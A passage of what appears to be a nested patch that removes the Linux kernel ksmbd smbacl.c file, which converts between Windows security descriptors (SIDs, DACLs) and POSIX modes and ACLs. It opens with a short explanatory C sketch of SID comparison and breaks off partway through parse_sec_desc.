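+comparing fields in sequence: the revision byte, the six authority bytes,
+then each 32-bit sub-authority over the shorter of the two counts. A
+host-endian stand-alone sketch of that comparison; the struct and the name
+sid_cmp are illustrative, and NULL handling is omitted for brevity.
+
+	#include <stdint.h>
+
+	#define NUM_AUTHS		6
+	#define SID_MAX_SUB_AUTHORITIES	15
+
+	struct sid {
+		uint8_t  revision;
+		uint8_t  num_subauth;
+		uint8_t  authority[NUM_AUTHS];
+		uint32_t sub_auth[SID_MAX_SUB_AUTHORITIES];
+	};
+
+	/* Returns 1, -1 or 0, comparing the same fields in the same
+	 * order as the removed compare_sids(). */
+	static int sid_cmp(const struct sid *a, const struct sid *b)
+	{
+		int i, n;
+
+		if (a->revision != b->revision)
+			return a->revision > b->revision ? 1 : -1;
+		for (i = 0; i < NUM_AUTHS; i++)
+			if (a->authority[i] != b->authority[i])
+				return a->authority[i] > b->authority[i] ? 1 : -1;
+		n = a->num_subauth < b->num_subauth ? a->num_subauth : b->num_subauth;
+		for (i = 0; i < n; i++)
+			if (a->sub_auth[i] != b->sub_auth[i])
+				return a->sub_auth[i] > b->sub_auth[i] ? 1 : -1;
+		return 0;
+	}
+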
+diff --git a/fs/ksmbd/smbacl.c b/fs/ksmbd/smbacl.c
+deleted file mode 100644
+index b05ff9b146b55..0000000000000
+--- a/fs/ksmbd/smbacl.c
++++ /dev/null
+@@ -1,1436 +0,0 @@
+-// SPDX-License-Identifier: LGPL-2.1+
+-/*
+- *   Copyright (C) International Business Machines  Corp., 2007,2008
+- *   Author(s): Steve French (sfrench@us.ibm.com)
+- *   Copyright (C) 2020 Samsung Electronics Co., Ltd.
+- *   Author(s): Namjae Jeon <linkinjeon@kernel.org>
+- */
+-
+-#include <linux/fs.h>
+-#include <linux/slab.h>
+-#include <linux/string.h>
+-#include <linux/mnt_idmapping.h>
+-
+-#include "smbacl.h"
+-#include "smb_common.h"
+-#include "server.h"
+-#include "misc.h"
+-#include "mgmt/share_config.h"
+-
+-static const struct smb_sid domain = {1, 4, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(21), cpu_to_le32(1), cpu_to_le32(2), cpu_to_le32(3),
+-	0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* security id for creator owner */
+-static const struct smb_sid creator_owner = {
+-	1, 1, {0, 0, 0, 0, 0, 3}, {0} };
+-/* security id for creator group */
+-static const struct smb_sid creator_group = {
+-	1, 1, {0, 0, 0, 0, 0, 3}, {cpu_to_le32(1)} };
+-
+-/* security id for everyone/world system group */
+-static const struct smb_sid sid_everyone = {
+-	1, 1, {0, 0, 0, 0, 0, 1}, {0} };
+-/* security id for Authenticated Users system group */
+-static const struct smb_sid sid_authusers = {
+-	1, 1, {0, 0, 0, 0, 0, 5}, {cpu_to_le32(11)} };
+-
+-/* S-1-22-1 Unmapped Unix users */
+-static const struct smb_sid sid_unix_users = {1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-22-2 Unmapped Unix groups */
+-static const struct smb_sid sid_unix_groups = { 1, 1, {0, 0, 0, 0, 0, 22},
+-		{cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * See http://technet.microsoft.com/en-us/library/hh509017(v=ws.10).aspx
+- */
+-
+-/* S-1-5-88 MS NFS and Apple style UID/GID/mode */
+-
+-/* S-1-5-88-1 Unix uid */
+-static const struct smb_sid sid_unix_NFS_users = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(1), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-2 Unix gid */
+-static const struct smb_sid sid_unix_NFS_groups = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(2), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/* S-1-5-88-3 Unix mode */
+-static const struct smb_sid sid_unix_NFS_mode = { 1, 2, {0, 0, 0, 0, 0, 5},
+-	{cpu_to_le32(88),
+-	 cpu_to_le32(3), 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0} };
+-
+-/*
+- * if the two SIDs (roughly equivalent to a UUID for a user or group) are
+- * the same, returns zero; if they do not match, returns non-zero.
+- */
+-int compare_sids(const struct smb_sid *ctsid, const struct smb_sid *cwsid)
+-{
+-	int i;
+-	int num_subauth, num_sat, num_saw;
+-
+-	if (!ctsid || !cwsid)
+-		return 1;
+-
+-	/* compare the revision */
+-	if (ctsid->revision != cwsid->revision) {
+-		if (ctsid->revision > cwsid->revision)
+-			return 1;
+-		else
+-			return -1;
+-	}
+-
+-	/* compare all of the six auth values */
+-	for (i = 0; i < NUM_AUTHS; ++i) {
+-		if (ctsid->authority[i] != cwsid->authority[i]) {
+-			if (ctsid->authority[i] > cwsid->authority[i])
+-				return 1;
+-			else
+-				return -1;
+-		}
+-	}
+-
+-	/* compare all of the subauth values if any */
+-	num_sat = ctsid->num_subauth;
+-	num_saw = cwsid->num_subauth;
+-	num_subauth = num_sat < num_saw ? num_sat : num_saw;
+-	if (num_subauth) {
+-		for (i = 0; i < num_subauth; ++i) {
+-			if (ctsid->sub_auth[i] != cwsid->sub_auth[i]) {
+-				if (le32_to_cpu(ctsid->sub_auth[i]) >
+-				    le32_to_cpu(cwsid->sub_auth[i]))
+-					return 1;
+-				else
+-					return -1;
+-			}
+-		}
+-	}
+-
+-	return 0; /* sids compare/match */
+-}
+-
+-static void smb_copy_sid(struct smb_sid *dst, const struct smb_sid *src)
+-{
+-	int i;
+-
+-	dst->revision = src->revision;
+-	dst->num_subauth = min_t(u8, src->num_subauth, SID_MAX_SUB_AUTHORITIES);
+-	for (i = 0; i < NUM_AUTHS; ++i)
+-		dst->authority[i] = src->authority[i];
+-	for (i = 0; i < dst->num_subauth; ++i)
+-		dst->sub_auth[i] = src->sub_auth[i];
+-}
+-
+-/*
+- * change posix mode to reflect permissions
+- * pmode is the existing mode (we only want to overwrite part of this);
+- * bits to set can be: S_IRWXU, S_IRWXG or S_IRWXO, i.e. 00700, 00070 or 00007
+- */
+-static umode_t access_flags_to_mode(struct smb_fattr *fattr, __le32 ace_flags,
+-				    int type)
+-{
+-	__u32 flags = le32_to_cpu(ace_flags);
+-	umode_t mode = 0;
+-
+-	if (flags & GENERIC_ALL) {
+-		mode = 0777;
+-		ksmbd_debug(SMB, "all perms\n");
+-		return mode;
+-	}
+-
+-	if ((flags & GENERIC_READ) || (flags & FILE_READ_RIGHTS))
+-		mode = 0444;
+-	if ((flags & GENERIC_WRITE) || (flags & FILE_WRITE_RIGHTS)) {
+-		mode |= 0222;
+-		if (S_ISDIR(fattr->cf_mode))
+-			mode |= 0111;
+-	}
+-	if ((flags & GENERIC_EXECUTE) || (flags & FILE_EXEC_RIGHTS))
+-		mode |= 0111;
+-
+-	if (type == ACCESS_DENIED_ACE_TYPE || type == ACCESS_DENIED_OBJECT_ACE_TYPE)
+-		mode = ~mode;
+-
+-	ksmbd_debug(SMB, "access flags 0x%x mode now %04o\n", flags, mode);
+-
+-	return mode;
+-}
+-
+-/*
+- * Generate access flags to reflect permissions mode is the existing mode.
+- * This function is called for every ACE in the DACL whose SID matches
+- * with either owner or group or everyone.
+- */
+-static void mode_to_access_flags(umode_t mode, umode_t bits_to_use,
+-				 __u32 *pace_flags)
+-{
+-	/* reset access mask */
+-	*pace_flags = 0x0;
+-
+-	/* bits to use are either S_IRWXU or S_IRWXG or S_IRWXO */
+-	mode &= bits_to_use;
+-
+-	/*
+-	 * check for R/W/X UGO since we do not know whose flags
+-	 * these are, but we have cleared all the bits sans RWX for
+-	 * either user or group or other as per bits_to_use
+-	 */
+-	if (mode & 0444)
+-		*pace_flags |= SET_FILE_READ_RIGHTS;
+-	if (mode & 0222)
+-		*pace_flags |= FILE_WRITE_RIGHTS;
+-	if (mode & 0111)
+-		*pace_flags |= SET_FILE_EXEC_RIGHTS;
+-
+-	ksmbd_debug(SMB, "mode: %o, access flags now 0x%x\n",
+-		    mode, *pace_flags);
+-}
+-
+-static __u16 fill_ace_for_sid(struct smb_ace *pntace,
+-			      const struct smb_sid *psid, int type, int flags,
+-			      umode_t mode, umode_t bits)
+-{
+-	int i;
+-	__u16 size = 0;
+-	__u32 access_req = 0;
+-
+-	pntace->type = type;
+-	pntace->flags = flags;
+-	mode_to_access_flags(mode, bits, &access_req);
+-	if (!access_req)
+-		access_req = SET_MINIMUM_RIGHTS;
+-	pntace->access_req = cpu_to_le32(access_req);
+-
+-	pntace->sid.revision = psid->revision;
+-	pntace->sid.num_subauth = psid->num_subauth;
+-	for (i = 0; i < NUM_AUTHS; i++)
+-		pntace->sid.authority[i] = psid->authority[i];
+-	for (i = 0; i < psid->num_subauth; i++)
+-		pntace->sid.sub_auth[i] = psid->sub_auth[i];
+-
+-	size = 1 + 1 + 2 + 4 + 1 + 1 + 6 + (psid->num_subauth * 4);
+-	pntace->size = cpu_to_le16(size);
+-
+-	return size;
+-}
+-
+-void id_to_sid(unsigned int cid, uint sidtype, struct smb_sid *ssid)
+-{
+-	switch (sidtype) {
+-	case SIDOWNER:
+-		smb_copy_sid(ssid, &server_conf.domain_sid);
+-		break;
+-	case SIDUNIX_USER:
+-		smb_copy_sid(ssid, &sid_unix_users);
+-		break;
+-	case SIDUNIX_GROUP:
+-		smb_copy_sid(ssid, &sid_unix_groups);
+-		break;
+-	case SIDCREATOR_OWNER:
+-		smb_copy_sid(ssid, &creator_owner);
+-		return;
+-	case SIDCREATOR_GROUP:
+-		smb_copy_sid(ssid, &creator_group);
+-		return;
+-	case SIDNFS_USER:
+-		smb_copy_sid(ssid, &sid_unix_NFS_users);
+-		break;
+-	case SIDNFS_GROUP:
+-		smb_copy_sid(ssid, &sid_unix_NFS_groups);
+-		break;
+-	case SIDNFS_MODE:
+-		smb_copy_sid(ssid, &sid_unix_NFS_mode);
+-		break;
+-	default:
+-		return;
+-	}
+-
+-	/* RID */
+-	ssid->sub_auth[ssid->num_subauth] = cpu_to_le32(cid);
+-	ssid->num_subauth++;
+-}
+-
+-static int sid_to_id(struct user_namespace *user_ns,
+-		     struct smb_sid *psid, uint sidtype,
+-		     struct smb_fattr *fattr)
+-{
+-	int rc = -EINVAL;
+-
+-	/*
+-	 * If we have too many subauthorities, then something is really wrong.
+-	 * Just return an error.
+-	 */
+-	if (unlikely(psid->num_subauth > SID_MAX_SUB_AUTHORITIES)) {
+-		pr_err("%s: %u subauthorities is too many!\n",
+-		       __func__, psid->num_subauth);
+-		return -EIO;
+-	}
+-
+-	if (sidtype == SIDOWNER) {
+-		kuid_t uid;
+-		uid_t id;
+-
+-		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
+-		uid = KUIDT_INIT(id);
+-		uid = from_vfsuid(user_ns, &init_user_ns, VFSUIDT_INIT(uid));
+-		if (uid_valid(uid)) {
+-			fattr->cf_uid = uid;
+-			rc = 0;
+-		}
+-	} else {
+-		kgid_t gid;
+-		gid_t id;
+-
+-		id = le32_to_cpu(psid->sub_auth[psid->num_subauth - 1]);
+-		gid = KGIDT_INIT(id);
+-		gid = from_vfsgid(user_ns, &init_user_ns, VFSGIDT_INIT(gid));
+-		if (gid_valid(gid)) {
+-			fattr->cf_gid = gid;
+-			rc = 0;
+-		}
+-	}
+-
+-	return rc;
+-}
+-
+-void posix_state_to_acl(struct posix_acl_state *state,
+-			struct posix_acl_entry *pace)
+-{
+-	int i;
+-
+-	pace->e_tag = ACL_USER_OBJ;
+-	pace->e_perm = state->owner.allow;
+-	for (i = 0; i < state->users->n; i++) {
+-		pace++;
+-		pace->e_tag = ACL_USER;
+-		pace->e_uid = state->users->aces[i].uid;
+-		pace->e_perm = state->users->aces[i].perms.allow;
+-	}
+-
+-	pace++;
+-	pace->e_tag = ACL_GROUP_OBJ;
+-	pace->e_perm = state->group.allow;
+-
+-	for (i = 0; i < state->groups->n; i++) {
+-		pace++;
+-		pace->e_tag = ACL_GROUP;
+-		pace->e_gid = state->groups->aces[i].gid;
+-		pace->e_perm = state->groups->aces[i].perms.allow;
+-	}
+-
+-	if (state->users->n || state->groups->n) {
+-		pace++;
+-		pace->e_tag = ACL_MASK;
+-		pace->e_perm = state->mask.allow;
+-	}
+-
+-	pace++;
+-	pace->e_tag = ACL_OTHER;
+-	pace->e_perm = state->other.allow;
+-}
+-
+-int init_acl_state(struct posix_acl_state *state, int cnt)
+-{
+-	int alloc;
+-
+-	memset(state, 0, sizeof(struct posix_acl_state));
+-	/*
+-	 * In the worst case, each individual acl could be for a distinct
+-	 * named user or group, but we don't know which, so we allocate
+-	 * enough space for either:
+-	 */
+-	alloc = sizeof(struct posix_ace_state_array)
+-		+ cnt * sizeof(struct posix_user_ace_state);
+-	state->users = kzalloc(alloc, GFP_KERNEL);
+-	if (!state->users)
+-		return -ENOMEM;
+-	state->groups = kzalloc(alloc, GFP_KERNEL);
+-	if (!state->groups) {
+-		kfree(state->users);
+-		return -ENOMEM;
+-	}
+-	return 0;
+-}
+-
+-void free_acl_state(struct posix_acl_state *state)
+-{
+-	kfree(state->users);
+-	kfree(state->groups);
+-}
+-
+-static void parse_dacl(struct user_namespace *user_ns,
+-		       struct smb_acl *pdacl, char *end_of_acl,
+-		       struct smb_sid *pownersid, struct smb_sid *pgrpsid,
+-		       struct smb_fattr *fattr)
+-{
+-	int i, ret;
+-	int num_aces = 0;
+-	unsigned int acl_size;
+-	char *acl_base;
+-	struct smb_ace **ppace;
+-	struct posix_acl_entry *cf_pace, *cf_pdace;
+-	struct posix_acl_state acl_state, default_acl_state;
+-	umode_t mode = 0, acl_mode;
+-	bool owner_found = false, group_found = false, others_found = false;
+-
+-	if (!pdacl)
+-		return;
+-
+-	/* validate that we do not go past end of acl */
+-	if (end_of_acl < (char *)pdacl + sizeof(struct smb_acl) ||
+-	    end_of_acl < (char *)pdacl + le16_to_cpu(pdacl->size)) {
+-		pr_err("ACL too small to parse DACL\n");
+-		return;
+-	}
+-
+-	ksmbd_debug(SMB, "DACL revision %d size %d num aces %d\n",
+-		    le16_to_cpu(pdacl->revision), le16_to_cpu(pdacl->size),
+-		    le32_to_cpu(pdacl->num_aces));
+-
+-	acl_base = (char *)pdacl;
+-	acl_size = sizeof(struct smb_acl);
+-
+-	num_aces = le32_to_cpu(pdacl->num_aces);
+-	if (num_aces <= 0)
+-		return;
+-
+-	if (num_aces > ULONG_MAX / sizeof(struct smb_ace *))
+-		return;
+-
+-	ppace = kmalloc_array(num_aces, sizeof(struct smb_ace *), GFP_KERNEL);
+-	if (!ppace)
+-		return;
+-
+-	ret = init_acl_state(&acl_state, num_aces);
+-	if (ret)
+-		return;
+-	ret = init_acl_state(&default_acl_state, num_aces);
+-	if (ret) {
+-		free_acl_state(&acl_state);
+-		return;
+-	}
+-
+-	/*
+-	 * reset rwx permissions for user/group/other.
+-	 * Also, if num_aces is 0 i.e. DACL has no ACEs,
+-	 * user/group/other have no permissions
+-	 */
+-	for (i = 0; i < num_aces; ++i) {
+-		if (end_of_acl - acl_base < acl_size)
+-			break;
+-
+-		ppace[i] = (struct smb_ace *)(acl_base + acl_size);
+-		acl_base = (char *)ppace[i];
+-		acl_size = offsetof(struct smb_ace, sid) +
+-			offsetof(struct smb_sid, sub_auth);
+-
+-		if (end_of_acl - acl_base < acl_size ||
+-		    ppace[i]->sid.num_subauth > SID_MAX_SUB_AUTHORITIES ||
+-		    (end_of_acl - acl_base <
+-		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth) ||
+-		    (le16_to_cpu(ppace[i]->size) <
+-		     acl_size + sizeof(__le32) * ppace[i]->sid.num_subauth))
+-			break;
+-
+-		acl_size = le16_to_cpu(ppace[i]->size);
+-		ppace[i]->access_req =
+-			smb_map_generic_desired_access(ppace[i]->access_req);
+-
+-		if (!(compare_sids(&ppace[i]->sid, &sid_unix_NFS_mode))) {
+-			fattr->cf_mode =
+-				le32_to_cpu(ppace[i]->sid.sub_auth[2]);
+-			break;
+-		} else if (!compare_sids(&ppace[i]->sid, pownersid)) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0700;
+-
+-			if (!owner_found) {
+-				mode &= ~(0700);
+-				mode |= acl_mode;
+-			}
+-			owner_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, pgrpsid) ||
+-			   ppace[i]->sid.sub_auth[ppace[i]->sid.num_subauth - 1] ==
+-			    DOMAIN_USER_RID_LE) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0070;
+-			if (!group_found) {
+-				mode &= ~(0070);
+-				mode |= acl_mode;
+-			}
+-			group_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, &sid_everyone)) {
+-			acl_mode = access_flags_to_mode(fattr,
+-							ppace[i]->access_req,
+-							ppace[i]->type);
+-			acl_mode &= 0007;
+-			if (!others_found) {
+-				mode &= ~(0007);
+-				mode |= acl_mode;
+-			}
+-			others_found = true;
+-		} else if (!compare_sids(&ppace[i]->sid, &creator_owner)) {
+-			continue;
+-		} else if (!compare_sids(&ppace[i]->sid, &creator_group)) {
+-			continue;
+-		} else if (!compare_sids(&ppace[i]->sid, &sid_authusers)) {
+-			continue;
+-		} else {
+-			struct smb_fattr temp_fattr;
+-
+-			acl_mode = access_flags_to_mode(fattr, ppace[i]->access_req,
+-							ppace[i]->type);
+-			temp_fattr.cf_uid = INVALID_UID;
+-			ret = sid_to_id(user_ns, &ppace[i]->sid, SIDOWNER, &temp_fattr);
+-			if (ret || uid_eq(temp_fattr.cf_uid, INVALID_UID)) {
+-				pr_err("%s: Error %d mapping Owner SID to uid\n",
+-				       __func__, ret);
+-				continue;
+-			}
+-
+-			acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
+-			acl_state.users->aces[acl_state.users->n].uid =
+-				temp_fattr.cf_uid;
+-			acl_state.users->aces[acl_state.users->n++].perms.allow =
+-				((acl_mode & 0700) >> 6) | 0004;
+-			default_acl_state.owner.allow = ((acl_mode & 0700) >> 6) | 0004;
+-			default_acl_state.users->aces[default_acl_state.users->n].uid =
+-				temp_fattr.cf_uid;
+-			default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
+-				((acl_mode & 0700) >> 6) | 0004;
+-		}
+-	}
+-	kfree(ppace);
+-
+-	if (owner_found) {
+-		/* The owner must be set to at least read-only. */
+-		acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
+-		acl_state.users->aces[acl_state.users->n].uid = fattr->cf_uid;
+-		acl_state.users->aces[acl_state.users->n++].perms.allow =
+-			((mode & 0700) >> 6) | 0004;
+-		default_acl_state.owner.allow = ((mode & 0700) >> 6) | 0004;
+-		default_acl_state.users->aces[default_acl_state.users->n].uid =
+-			fattr->cf_uid;
+-		default_acl_state.users->aces[default_acl_state.users->n++].perms.allow =
+-			((mode & 0700) >> 6) | 0004;
+-	}
+-
+-	if (group_found) {
+-		acl_state.group.allow = (mode & 0070) >> 3;
+-		acl_state.groups->aces[acl_state.groups->n].gid =
+-			fattr->cf_gid;
+-		acl_state.groups->aces[acl_state.groups->n++].perms.allow =
+-			(mode & 0070) >> 3;
+-		default_acl_state.group.allow = (mode & 0070) >> 3;
+-		default_acl_state.groups->aces[default_acl_state.groups->n].gid =
+-			fattr->cf_gid;
+-		default_acl_state.groups->aces[default_acl_state.groups->n++].perms.allow =
+-			(mode & 0070) >> 3;
+-	}
+-
+-	if (others_found) {
+-		fattr->cf_mode &= ~(0007);
+-		fattr->cf_mode |= mode & 0007;
+-
+-		acl_state.other.allow = mode & 0007;
+-		default_acl_state.other.allow = mode & 0007;
+-	}
+-
+-	if (acl_state.users->n || acl_state.groups->n) {
+-		acl_state.mask.allow = 0x07;
+-
+-		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-			fattr->cf_acls =
+-				posix_acl_alloc(acl_state.users->n +
+-					acl_state.groups->n + 4, GFP_KERNEL);
+-			if (fattr->cf_acls) {
+-				cf_pace = fattr->cf_acls->a_entries;
+-				posix_state_to_acl(&acl_state, cf_pace);
+-			}
+-		}
+-	}
+-
+-	if (default_acl_state.users->n || default_acl_state.groups->n) {
+-		default_acl_state.mask.allow = 0x07;
+-
+-		if (IS_ENABLED(CONFIG_FS_POSIX_ACL)) {
+-			fattr->cf_dacls =
+-				posix_acl_alloc(default_acl_state.users->n +
+-				default_acl_state.groups->n + 4, GFP_KERNEL);
+-			if (fattr->cf_dacls) {
+-				cf_pdace = fattr->cf_dacls->a_entries;
+-				posix_state_to_acl(&default_acl_state, cf_pdace);
+-			}
+-		}
+-	}
+-	free_acl_state(&acl_state);
+-	free_acl_state(&default_acl_state);
+-}
+-
+-static void set_posix_acl_entries_dacl(struct user_namespace *user_ns,
+-				       struct smb_ace *pndace,
+-				       struct smb_fattr *fattr, u32 *num_aces,
+-				       u16 *size, u32 nt_aces_num)
+-{
+-	struct posix_acl_entry *pace;
+-	struct smb_sid *sid;
+-	struct smb_ace *ntace;
+-	int i, j;
+-
+-	if (!fattr->cf_acls)
+-		goto posix_default_acl;
+-
+-	pace = fattr->cf_acls->a_entries;
+-	for (i = 0; i < fattr->cf_acls->a_count; i++, pace++) {
+-		int flags = 0;
+-
+-		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-		if (!sid)
+-			break;
+-
+-		if (pace->e_tag == ACL_USER) {
+-			uid_t uid;
+-			unsigned int sid_type = SIDOWNER;
+-
+-			uid = posix_acl_uid_translate(user_ns, pace);
+-			if (!uid)
+-				sid_type = SIDUNIX_USER;
+-			id_to_sid(uid, sid_type, sid);
+-		} else if (pace->e_tag == ACL_GROUP) {
+-			gid_t gid;
+-
+-			gid = posix_acl_gid_translate(user_ns, pace);
+-			id_to_sid(gid, SIDUNIX_GROUP, sid);
+-		} else if (pace->e_tag == ACL_OTHER && !nt_aces_num) {
+-			smb_copy_sid(sid, &sid_everyone);
+-		} else {
+-			kfree(sid);
+-			continue;
+-		}
+-		ntace = pndace;
+-		for (j = 0; j < nt_aces_num; j++) {
+-			if (ntace->sid.sub_auth[ntace->sid.num_subauth - 1] ==
+-					sid->sub_auth[sid->num_subauth - 1])
+-				goto pass_same_sid;
+-			ntace = (struct smb_ace *)((char *)ntace +
+-					le16_to_cpu(ntace->size));
+-		}
+-
+-		if (S_ISDIR(fattr->cf_mode) && pace->e_tag == ACL_OTHER)
+-			flags = 0x03;
+-
+-		ntace = (struct smb_ace *)((char *)pndace + *size);
+-		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, flags,
+-				pace->e_perm, 0777);
+-		(*num_aces)++;
+-		if (pace->e_tag == ACL_USER)
+-			ntace->access_req |=
+-				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-
+-		if (S_ISDIR(fattr->cf_mode) &&
+-		    (pace->e_tag == ACL_USER || pace->e_tag == ACL_GROUP)) {
+-			ntace = (struct smb_ace *)((char *)pndace + *size);
+-			*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED,
+-					0x03, pace->e_perm, 0777);
+-			(*num_aces)++;
+-			if (pace->e_tag == ACL_USER)
+-				ntace->access_req |=
+-					FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-		}
+-
+-pass_same_sid:
+-		kfree(sid);
+-	}
+-
+-	if (nt_aces_num)
+-		return;
+-
+-posix_default_acl:
+-	if (!fattr->cf_dacls)
+-		return;
+-
+-	pace = fattr->cf_dacls->a_entries;
+-	for (i = 0; i < fattr->cf_dacls->a_count; i++, pace++) {
+-		sid = kmalloc(sizeof(struct smb_sid), GFP_KERNEL);
+-		if (!sid)
+-			break;
+-
+-		if (pace->e_tag == ACL_USER) {
+-			uid_t uid;
+-
+-			uid = posix_acl_uid_translate(user_ns, pace);
+-			id_to_sid(uid, SIDCREATOR_OWNER, sid);
+-		} else if (pace->e_tag == ACL_GROUP) {
+-			gid_t gid;
+-
+-			gid = posix_acl_gid_translate(user_ns, pace);
+-			id_to_sid(gid, SIDCREATOR_GROUP, sid);
+-		} else {
+-			kfree(sid);
+-			continue;
+-		}
+-
+-		ntace = (struct smb_ace *)((char *)pndace + *size);
+-		*size += fill_ace_for_sid(ntace, sid, ACCESS_ALLOWED, 0x0b,
+-				pace->e_perm, 0777);
+-		(*num_aces)++;
+-		if (pace->e_tag == ACL_USER)
+-			ntace->access_req |=
+-				FILE_DELETE_LE | FILE_DELETE_CHILD_LE;
+-		kfree(sid);
+-	}
+-}
+-
+-static void set_ntacl_dacl(struct user_namespace *user_ns,
+-			   struct smb_acl *pndacl,
+-			   struct smb_acl *nt_dacl,
+-			   unsigned int aces_size,
+-			   const struct smb_sid *pownersid,
+-			   const struct smb_sid *pgrpsid,
+-			   struct smb_fattr *fattr)
+-{
+-	struct smb_ace *ntace, *pndace;
+-	int nt_num_aces = le32_to_cpu(nt_dacl->num_aces), num_aces = 0;
+-	unsigned short size = 0;
+-	int i;
+-
+-	pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
+-	if (nt_num_aces) {
+-		ntace = (struct smb_ace *)((char *)nt_dacl + sizeof(struct smb_acl));
+-		for (i = 0; i < nt_num_aces; i++) {
+-			unsigned short nt_ace_size;
+-
+-			if (offsetof(struct smb_ace, access_req) > aces_size)
+-				break;
+-
+-			nt_ace_size = le16_to_cpu(ntace->size);
+-			if (nt_ace_size > aces_size)
+-				break;
+-
+-			memcpy((char *)pndace + size, ntace, nt_ace_size);
+-			size += nt_ace_size;
+-			aces_size -= nt_ace_size;
+-			ntace = (struct smb_ace *)((char *)ntace + nt_ace_size);
+-			num_aces++;
+-		}
+-	}
+-
+-	set_posix_acl_entries_dacl(user_ns, pndace, fattr,
+-				   &num_aces, &size, nt_num_aces);
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
+-}
+-
+-static void set_mode_dacl(struct user_namespace *user_ns,
+-			  struct smb_acl *pndacl, struct smb_fattr *fattr)
+-{
+-	struct smb_ace *pace, *pndace;
+-	u32 num_aces = 0;
+-	u16 size = 0, ace_size = 0;
+-	uid_t uid;
+-	const struct smb_sid *sid;
+-
+-	pace = pndace = (struct smb_ace *)((char *)pndacl + sizeof(struct smb_acl));
+-
+-	if (fattr->cf_acls) {
+-		set_posix_acl_entries_dacl(user_ns, pndace, fattr,
+-					   &num_aces, &size, num_aces);
+-		goto out;
+-	}
+-
+-	/* owner RID */
+-	uid = from_kuid(&init_user_ns, fattr->cf_uid);
+-	if (uid)
+-		sid = &server_conf.domain_sid;
+-	else
+-		sid = &sid_unix_users;
+-	ace_size = fill_ace_for_sid(pace, sid, ACCESS_ALLOWED, 0,
+-				    fattr->cf_mode, 0700);
+-	pace->sid.sub_auth[pace->sid.num_subauth++] = cpu_to_le32(uid);
+-	pace->size = cpu_to_le16(ace_size + 4);
+-	size += le16_to_cpu(pace->size);
+-	pace = (struct smb_ace *)((char *)pndace + size);
+-
+-	/* Group RID */
+-	ace_size = fill_ace_for_sid(pace, &sid_unix_groups,
+-				    ACCESS_ALLOWED, 0, fattr->cf_mode, 0070);
+-	pace->sid.sub_auth[pace->sid.num_subauth++] =
+-		cpu_to_le32(from_kgid(&init_user_ns, fattr->cf_gid));
+-	pace->size = cpu_to_le16(ace_size + 4);
+-	size += le16_to_cpu(pace->size);
+-	pace = (struct smb_ace *)((char *)pndace + size);
+-	num_aces = 3;
+-
+-	if (S_ISDIR(fattr->cf_mode)) {
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-
+-		/* creator owner */
+-		size += fill_ace_for_sid(pace, &creator_owner, ACCESS_ALLOWED,
+-					 0x0b, fattr->cf_mode, 0700);
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-
+-		/* creator group */
+-		size += fill_ace_for_sid(pace, &creator_group, ACCESS_ALLOWED,
+-					 0x0b, fattr->cf_mode, 0070);
+-		pace = (struct smb_ace *)((char *)pndace + size);
+-		num_aces = 5;
+-	}
+-
+-	/* other */
+-	size += fill_ace_for_sid(pace, &sid_everyone, ACCESS_ALLOWED, 0,
+-				 fattr->cf_mode, 0007);
+-
+-out:
+-	pndacl->num_aces = cpu_to_le32(num_aces);
+-	pndacl->size = cpu_to_le16(le16_to_cpu(pndacl->size) + size);
+-}
+-
+-static int parse_sid(struct smb_sid *psid, char *end_of_acl)
+-{
+-	/*
+-	 * validate that we do not go past end of ACL - sid must be at least 8
+-	 * bytes long (assuming no sub-auths - e.g. the null SID
+-	 */
+-	if (end_of_acl < (char *)psid + 8) {
+-		pr_err("ACL too small to parse SID %p\n", psid);
+-		return -EINVAL;
+-	}
+-
+-	return 0;
+-}
+-
+-/* Convert CIFS ACL to POSIX form */
+-int parse_sec_desc(struct user_namespace *user_ns, struct smb_ntsd *pntsd,
+-		   int acl_len, struct smb_fattr *fattr)
+-{
+-	int rc = 0;
+-	struct smb_sid *owner_sid_ptr, *group_sid_ptr;
+-	struct smb_acl *dacl_ptr; /* no need for SACL ptr */
+-	char *end_of_acl = ((char *)pntsd) + acl_len;
+-	__u32 dacloffset;
+-	int pntsd_type;
+-
+-	if (!pntsd)
+-		return -EIO;
+-
+-	if (acl_len < sizeof(struct smb_ntsd))
+-		return -EINVAL;
+-
+-	owner_sid_ptr = (struct smb_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->osidoffset));
+-	group_sid_ptr = (struct smb_sid *)((char *)pntsd +
+-			le32_to_cpu(pntsd->gsidoffset));
